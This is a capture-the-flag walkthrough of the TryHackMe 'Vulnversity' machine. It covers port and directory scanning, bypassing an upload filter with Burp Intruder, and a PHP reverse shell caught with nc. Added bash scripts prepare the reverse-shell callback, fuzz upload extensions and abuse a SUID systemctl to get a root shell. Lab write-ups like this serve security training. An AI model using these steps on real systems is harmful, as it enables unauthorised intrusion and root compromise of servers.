
Hacking into Vulnversity - TryHackMe

Vulnversity

Learn about active recon, web app attacks and privilege escalation.

https://tryhackme.com

Index

Reconnaissance

Nmap

Scan the open ports

nmap 10.10.64.159 -p1-65535 --open -T5 -n -oG openPorts.txt

[screenshot 1]

nmap: Network Mapper, the port scanner
10.10.64.159: target host IP
-p1-65535: port range to scan, equivalent to -p- (all TCP ports)
--open: report only open ports
-T5: fastest timing template, also the noisiest and the most likely to miss ports on a slow link; -T0 is the slowest and least intrusive
-n: skip DNS resolution, which is faster
-oG fileName: grepable output written to fileName. Each host goes on one line, so the file can be searched and parsed with standard Unix tools such as grep, awk, cut, sed and diff

nmap 10.10.64.159 -p1-65535 --open -sS --min-rate 4000 -vvv -n -Pn -oG ports2.txt 

-sS: SYN scan, the default when Nmap runs with raw-socket privileges (root). It sends a SYN and judges the port from the reply: SYN/ACK means open, RST means closed, no reply after several retransmissions (or an ICMP unreachable error of type 3, code 0, 1, 2, 3, 9, 10 or 13) means filtered. The handshake is never completed, which is why it is called half-open scanning; it is fast, thousands of ports per second on a network without restrictive firewalls, and comparatively quiet, although an IDS still logs it. Nmap also treats a SYN without ACK in response as open, a rare case known as a simultaneous open or split handshake (see https://nmap.org/misc/split-handshake.pdf).

-sU: UDP scan

-vvv: verbosity; with -v (up to -vvv) open ports are printed as they are discovered instead of only in the summary at the end of the scan

--min-rate: Nmap sends packets at least this fast, in packets per second; --min-rate 4000 keeps the rate at or above 4000 packets per second. A minimum rate does not stop Nmap from going faster if conditions allow

-Pn (No ping): skip host discovery and treat every target as up. Normally Nmap first checks which hosts are alive and only port-scans those; with -Pn it runs the requested scans against every address given, so a /16 on the command line means all 65,536 addresses are scanned. This is the option to use when the target drops ping probes and would otherwise be reported as down. Default timing parameters are used, which may make scans slower. To skip both host discovery and the port scan while still running NSE scripts, combine -Pn -sn.

On a local Ethernet segment ARP scanning is still performed (unless --disable-arp-ping or --send-ip is given), because Nmap needs MAC addresses to scan the hosts. In older Nmap versions -Pn was spelled -P0 and -PN.


Enumerate services running; let’s see what is behind the open ports

nmap 10.10.64.159 -sC -sV -p21,22,139,445,3128,3333 -oN target.txt

[screenshot 2]

-sV: probe open ports to determine service and version info
-sC: run the default set of NSE scripts, equivalent to --script=default. Some of these scripts are considered intrusive and should not be run against a network without permission
-p: scan only the specified ports, for example -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports: exclude the specified ports from scanning
-oN fileName: write Nmap's normal output to fileName. This format is roughly the same as the interactive output printed at runtime
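The two scans above are one workflow: the full-port sweep finds what is open, and the slower -sC -sV scan is then limited to exactly those ports. As an added example (not part of the original writeup), the script below pulls the open ports out of the grepable file and builds the second command from them. The -oG content embedded in it is constructed to match the six ports the writeup found; the nmap version and timing strings in it are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): turn the grepable output of
# the full-port scan into the port list for the follow-up -sC -sV scan.
# The nmap version, timings and the sample file contents below are constructed.

# Constructed -oG output with the six ports the writeup found open.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap 10.10.64.159 -p1-65535 --open -T5 -n -oG openPorts.txt
Host: 10.10.64.159 ()  Status: Up
Host: 10.10.64.159 ()  Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3128/open/tcp//http-proxy///, 3333/open/tcp//dec-notes///  Ignored State: closed (65529)
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds'

# open_ports <gnmap file>: print the open TCP ports as "21,22,139,...",
# the form nmap's -p option expects. Only entries in state "open" on TCP
# are taken; --open already keeps closed and filtered ports out of the file.
open_ports() {
  grep -o '[0-9][0-9]*/open/tcp' "$1" \
    | cut -d/ -f1 \
    | sort -n -u \
    | tr '\n' ',' \
    | sed 's/,$//'
}

# service_scan_cmd <host> <gnmap file> <output file>: build (but do not run)
# the second nmap command of the writeup from the first scan's results.
service_scan_cmd() {
  printf 'nmap %s -sC -sV -p%s -oN %s\n' "$1" "$(open_ports "$2")" "$3"
}

# Typical use against the real target, after the first scan has written
# openPorts.txt:
#   nmap 10.10.64.159 -sC -sV -p"$(open_ports openPorts.txt)" -oN target.txt
```

Because sort -n -u is applied, the function also de-duplicates ports if several -oG files are concatenated, which is handy when a slow -T5 run has to be repeated with a lower rate.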

whatweb

Identify technologies used by the website.

whatweb http://10.10.64.159:3333

[screenshot 3]

WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account ID's, web framework modules, SQL errors, and more.

wafw00f

Identify and fingerprint Web Application Firewall products

wafw00f http://10.10.64.159:3333/

[screenshot 4]

wafw00f sends a normal HTTP request and analyses the response, which identifies a number of WAF products. If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that also fails, it analyses the responses it already received and uses another simple algorithm to guess whether a WAF or some other security solution is in front of the site.
Here wafw00f reports no web application firewall, so nothing should interfere with the upload fuzzing later on

Let's open the page in the browser: http://10.10.64.159:3333

[screenshot 5]

Don't forget to extend the machine's deployment time on the TryHackMe website when it is about to expire

[screenshot 5.1]

gobuster

Now we can enumerate directories on the web server

https://github.com/OJ/gobuster

gobuster dir -u http://10.10.64.159:3333/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

[screenshot 6]

Gobuster is a tool used to brute-force:
URLs (directories and files) on web sites.
DNS subdomains (with wildcard support).
Virtual host names on target web servers.
Open Amazon S3 buckets.

[screenshot 6.1]

dir: directory/file enumeration mode
-u: target URL
-w: path to the wordlist used for the brute force
-t, --threads int: number of concurrent threads (default 10)

Gobuster does not recurse into the directories it finds, so each discovered directory has to be scanned again by hand. It is written in Go, which handles sockets and many concurrent connections well and is faster than an interpreted script (such as Python)

We find the internal/ directory and the uploads/ directory
[screenshot 9]

Gaining Access

Parrot OS already has reverse-shells but we could download a new one from the internet

http://pentestmonkey.net/tools/php-reverse-shell

[screenshot 11]

Let’s try to upload a .php payload to the server

[screenshot 12]

The upload is rejected: the .php extension is not allowed, so the form filters on the file extension

[screenshot 13]

Proxy

To learn which extensions the upload form accepts we will use Burp Suite. Burp has to sit between the browser and the server, so first point the browser at Burp's proxy listener (127.0.0.1:8080 by default), either with the FoxyProxy extension or manually:
Mozilla > Preferences > General > Network Settings > Settings

[screenshot 15]

Once we are done with Burp Suite we switch the browser back to "No proxy" in the same dialog.
While the proxy is active, HTTPS sites such as Google show a certificate error, because Burp re-signs every TLS connection with its own CA, which the browser does not trust yet. To fix it, browse to http://127.0.0.1:8080/, click "CA Certificate" and save the file

[screenshot 16]

Mozilla > Preferences > Privacy and Security > Security > Certificates > View Certificates

[screenshot 17]

Import the downloaded certificate

[screenshot 18]

[screenshot 19]

Tick "Trust this CA to identify websites", OK, OK

[screenshot 20]

Now there will be no certificate errors when browsing through Burp Suite

Burpsuite

Open Burp Suite to fuzz the upload form and find which file extension is accepted, so that we can upload our payload

Start Burp Suite with the browser proxy active

[screenshot 10]

Use the Burp defaults, start, and turn interception on:
Burp Suite > Proxy > Intercept > click "Intercept is off" so that it reads "Intercept is on"

[screenshot 14]

Submit the PHP reverse shell to the form again. This time Burp Suite intercepts the request: as soon as we click Submit the page keeps loading and the intercepted request shows up in Burp

Right click > Send to Intruder. Intruder is Burp's tool for automating customised attacks

[screenshot 21]

Intruder > Positions, click "Clear" on the right to remove the positions Burp marked automatically
Select the "Sniper" attack type: one payload set, one position, each payload tried in turn

[screenshot 21.1]

We are going to brute-force the extension to see which ones the server accepts
On the filename line select our file's extension, .php, and click "Add" on the right

[screenshot 22]

The selected extension is now wrapped in § markers, the payload position. Burp will substitute this part of the request with each word of the wordlist to find out which extension is allowed

[screenshot 23]

This is how we tell Burp Suite where in the request to substitute the wordlist entries for the brute force attack
Wordlists can be downloaded here: https://github.com/danielmiessler/SecLists
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-extensions-lowercase.txt

Download the wordlist directly from the terminal, using the raw version on GitHub

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-small-extensions-lowercase.txt

[screenshot 24]

Now Burp Suite > Intruder > Payloads; here we configure the attack and select the wordlist: in Payload Options click "Load"

[screenshot 25]

and open "raft-small-extensions-lowercase.txt", a wordlist of file extensions (each entry with its leading dot)

Uncheck "URL-encode these characters" under Payload Encoding: the default character set includes the dot, so .phtml would otherwise be sent as %2ephtml and never match the server's check

[screenshot 26]

Click the orange "Start attack" button at the top right of the Intruder tab

[screenshot 27]

Burp Suite is trying each extension

[screenshot 28]

Sort by the Length column: every rejected extension gets the same error page, but for .phtml the response length is different, so .phtml is accepted
We are done with Burp Suite, so we can close it and switch the proxy off again in the Firefox settings

[screenshot 29]

We see that the .phtml extension is allowed. On Debian/Ubuntu the default mod_php configuration also maps .phtml to the PHP handler, which is why a PHP payload with this extension still executes
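The Intruder run above is a plain loop: upload the same file under each extension and look for the response that does not match the others. As an added example (not part of the original writeup), the script below does the same from the shell with curl and the same SecLists wordlist, and separates the outlier detection into a function that works on recorded results. The form field names "file" and "submit" and the upload URL are assumptions; take the real ones from the request Burp intercepted.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): the extension fuzzing that
# Burp Intruder did, driven from the shell with curl. The form field names
# ("file", "submit") and the upload URL are assumptions; take the real ones
# from the intercepted request.

# upload_probe <url> <ext>: upload a harmless text file named probe<ext>
# and print "<ext> <http status> <response bytes>".
upload_probe() {
  local url=$1 ext=$2 tmp
  tmp=$(mktemp)
  printf 'probe\n' > "$tmp"
  printf '%s %s\n' "$ext" \
    "$(curl -s -o /dev/null -w '%{http_code} %{size_download}' \
          -F "file=@${tmp};filename=probe${ext}" -F 'submit=Upload' "$url")"
  rm -f "$tmp"
}

# outliers: read "<ext> <status> <bytes>" lines on stdin and print the ones
# whose response size differs from the most common size. A rejected
# extension returns the same error page every time, so the accepted one is
# the line that stands out, which is what the Intruder "Length" column shows.
outliers() {
  awk '{ count[$3]++; line[NR] = $0; size[NR] = $3 }
       END {
         best = ""; bestc = 0
         for (s in count) if (count[s] > bestc) { best = s; bestc = count[s] }
         for (i = 1; i <= NR; i++) if (size[i] != best) print line[i]
       }'
}

# fuzz_extensions <url> <wordlist>: run every extension of the wordlist
# through upload_probe and report the outliers. Needs network access to the
# target; the wordlist entries already carry their leading dot.
fuzz_extensions() {
  local url=$1 wordlist=$2 ext
  while IFS= read -r ext; do
    [ -n "$ext" ] && upload_probe "$url" "$ext"
  done < "$wordlist" | outliers
}

# Against the machine (upload URL assumed, check it in Burp first):
#   fuzz_extensions http://10.10.64.159:3333/internal/ raft-small-extensions-lowercase.txt
```

Comparing sizes rather than status codes matters here: the form answers 200 for both accepted and rejected files, so only the body length tells them apart. If the server pads responses or includes a timestamp, switch the awk key from the size to a hash of the body instead.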

Reverse-shell

Change the payload extension from php to phtml

cp /usr/share/webshells/php/php-reverse-shell.php /home/roberto/Downloads/php-reverse-shell.phtml

[screenshot 30]

Now the payload has to connect back to us, so we set our IP address and a port in its code. Port 443 is a good choice because outbound HTTPS traffic is usually allowed through firewalls; the IP address is the one of our tun0 (VPN) interface

nano /home/roberto/Downloads/php-reverse-shell.phtml

[screenshot 31]

Upload the payload

[screenshot 32]

The upload succeeds with the .phtml extension

[screenshot 34]

Now we listen on the port we set in the payload, 443

[screenshot 35]

netcat is a simple Unix utility that reads and writes data across network connections over TCP or UDP
-l: listen mode, for inbound connections
-v: verbose, gives information on the output (use twice to be more verbose)
-n: numeric-only IP addresses, no DNS
-p port: local port number (port numbers can be individual or ranges: lo-hi, inclusive)

With the listener running, open php-reverse-shell.phtml on the web server; the PHP executes and connects back to us
A reverse shell works the other way round from a normal login: the payload runs on the remote host and makes that host connect out to us. We listen for the incoming connection and, once it is established, control the remote server through it. This is what the reverse shell payload's code does

[screenshot 36]

As soon as we open the file we get the connection

[screenshot 37]

We are now on the remote server as the www-data user, the account the web server runs as

[screenshot 38]

TTY treatment

But this shell is not a proper TTY yet: no job control, no tab completion, and a Ctrl-C would kill the netcat connection instead of the remote command

[screenshot 39]

Make the TTY fully interactive: spawn a pseudo-terminal on the remote side, then background netcat and put the local terminal in raw mode

[screenshot 40]

fg (enter)

[screenshot 40.1]

(enter)

[screenshot 41]

If we open nano we see the wrong proportions, because the remote terminal does not know the size of our window

[screenshot 42]

To set the right proportions, open a new terminal on our system

[screenshot 43]

and read how many rows and columns our window has, then set the same values in the remote shell

[screenshot 44]

If we open the nano text editor now we have the right proportions

[screenshot 45]

Now we have a fully interactive TTY: the arrow keys and Ctrl-C work and the proportions are right
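The steps from editing the payload to the interactive TTY are a fixed sequence, and the listener and upgrade commands live only in the screenshots above. As an added example (not part of the original writeup), the script below collects that sequence: a function that patches the callback address into the pentestmonkey shell, a helper that reads our tun0 address, and the listener and TTY upgrade commands as they are typed. The attacker address 10.8.0.2, the upload path /internal/uploads/ and the two-line stand-in for the payload's variables are assumptions; the real php-reverse-shell.php marks both lines with "CHANGE THIS".

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): prepare the pentestmonkey
# payload, start the listener, trigger the shell and upgrade it to a full TTY.
# The attacker IP 10.8.0.2, the upload path /internal/uploads/ and the
# constructed snippet below are assumptions; check them against the real
# php-reverse-shell.php, which marks both lines with "CHANGE THIS".

# Constructed stand-in for the two lines of php-reverse-shell.php we edit.
SAMPLE_SHELL="\$ip = '127.0.0.1';  // CHANGE THIS
\$port = 1234;       // CHANGE THIS
"

# set_callback <file> <ip> <port>: point the payload at our listener.
# 443 is chosen because outbound HTTPS is rarely blocked by egress filtering.
# (GNU sed -i; on BSD/macOS use sed -i '' instead.)
set_callback() {
  local file=$1 ip=$2 port=$3
  sed -i -e "s/^[\$]ip = '[^']*';/\$ip = '$ip';/" \
         -e "s/^[\$]port = [0-9]*;/\$port = $port;/" "$file"
}

# callback_of <file>: print "<ip>:<port>" currently set in the payload,
# so the edit can be verified before uploading.
callback_of() {
  local ip port
  ip=$(sed -n "s/^[\$]ip = '\([^']*\)';.*/\1/p" "$1")
  port=$(sed -n 's/^[$]port = \([0-9]*\);.*/\1/p' "$1")
  printf '%s:%s\n' "$ip" "$port"
}

# tun0_ip: the VPN address the target can reach us on.
tun0_ip() {
  ip -4 addr show tun0 | awk '/inet /{ sub("/.*", "", $2); print $2 }'
}

# Steps on the attacker box (run by hand, in this order):
#   cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.phtml
#   set_callback php-reverse-shell.phtml "$(tun0_ip)" 443
#   callback_of php-reverse-shell.phtml        # sanity check
#   nc -lvnp 443           # listen, verbose, no DNS, local port 443
#   # upload the file through the form, then trigger it (assumed path):
#   curl -s http://10.10.64.159:3333/internal/uploads/php-reverse-shell.phtml
#
# In the shell nc receives, as www-data, upgrade it to a full TTY:
#   python -c 'import pty; pty.spawn("/bin/bash")'   # python3 on newer boxes
#   <Ctrl-Z>                                         # background nc locally
#   stty raw -echo; fg                               # local: pass keys raw
#   <Enter>
#   reset                                            # if the screen is garbled
#   export TERM=xterm
#   stty rows 50 cols 200   # values from `stty size` in a second local terminal
```

The stty raw -echo step is what makes Ctrl-C and the arrow keys reach the remote bash instead of the local netcat; without the matching rows/cols the remote side assumes an 80x24 window, which is the wrong proportion nano showed.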

Privilege escalation

With the user we got on the machine, www-data, we can read some parts of the system, and we find the user.txt flag

[screenshot 46]

SUID binaries

Now we need root. For privilege escalation on this Linux machine we are going to look at SUID binaries; let's list the binaries that have the SUID bit set

In Linux, SUID (set user ID upon execution) is a special file permission. A SUID binary runs with the privileges of the file's owner rather than those of the user who executes it, so a SUID-root binary that can be talked into running arbitrary commands gives us root.

For example, the binary that changes your password, /usr/bin/passwd, has the SUID bit set. Changing a password means writing to /etc/shadow, which only root can access, so passwd runs as root to make the change.

find / -perm -4000 2>/dev/null

-perm -4000 matches files whose SUID bit is set whatever the other permission bits are; 2>/dev/null hides the permission-denied errors from directories www-data cannot read

[screenshot 50]

The website https://gtfobins.github.io/ lists binaries and how each can be abused to escalate privileges; we look up the binaries from the list above to see if any of them is exploitable
For sudo we find nothing usable

[screenshot 50.1]

But systemctl is in the list

[screenshot 50.2]

The site also explains the technique

[screenshot 51]

We are going to set the SUID bit on /bin/bash

[screenshot 52]

We can copy the GTFOBins snippet and edit it

[screenshot 53]

changing the command it runs and the path to the systemctl binary

[screenshot 54]

Once the edited snippet has been run, /bin/bash has the SUID bit set

[screenshot 55]

bash -p gives us a root shell: -p tells bash not to drop the effective user ID it inherited from the SUID bit. We have escalated privileges

[screenshot 56]
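The page describes the systemctl trick only through the screenshots and the note to "change the command and the binary". As an added example (not part of the original writeup), the script below reconstructs it from the GTFOBins systemctl SUID entry: write a oneshot unit whose ExecStart runs as root, link and enable it through the SUID systemctl, then check the result. The unit contents, the /bin/systemctl path and the choice of /bin/bash as the target are assumptions; the exact text the author used is in the screenshots.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): the SUID check plus the
# systemctl trick from GTFOBins, edited as the writeup describes so that the
# unit makes /bin/bash SUID instead of writing `id` output to a file. The
# unit contents and the /bin/systemctl path are assumptions.

# find_suid: list SUID binaries. -perm -4000 matches files with the set-uid
# bit regardless of the other permission bits.
find_suid() {
  find / -type f -perm -4000 2>/dev/null
}

# is_suid <path>: true if the set-uid bit is on (test -u).
is_suid() {
  [ -u "$1" ]
}

# suid_unit <unit file> <target binary>: write a oneshot service whose
# ExecStart chmods the target. systemd starts ExecStart as root, and a SUID
# systemctl lets an unprivileged user link and enable the unit.
suid_unit() {
  local unit=$1 target=$2
  cat > "$unit" <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s $target"
[Install]
WantedBy=multi-user.target
EOF
}

# pop_root: only meaningful on the target, where systemctl is SUID root.
# Run by hand as www-data after find_suid has shown systemctl in the list.
pop_root() {
  local unit
  unit=$(mktemp).service          # systemd requires the .service suffix
  suid_unit "$unit" /bin/bash
  /bin/systemctl link "$unit"
  /bin/systemctl enable --now "$unit"
  ls -l /bin/bash                 # expect -rwsr-xr-x
  # bash resets the effective uid to ours unless -p is given
  is_suid /bin/bash && exec /bin/bash -p
}
```

The unit is a one-shot, so nothing keeps running afterwards; on a real engagement the unit file and the SUID bit on bash are both artefacts to record and clean up, since anyone else on the box gets the same root shell from bash -p.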

We list the directories and find the root.txt flag

[screenshot 57]

We check that the root flag is correct

[screenshot 58]

And we have finished this machine

[screenshot 59]

We are done!

Questionnaire

Now on TryHackMe we have some questions

[screenshots 7, 8, 47, 48, 49, 58]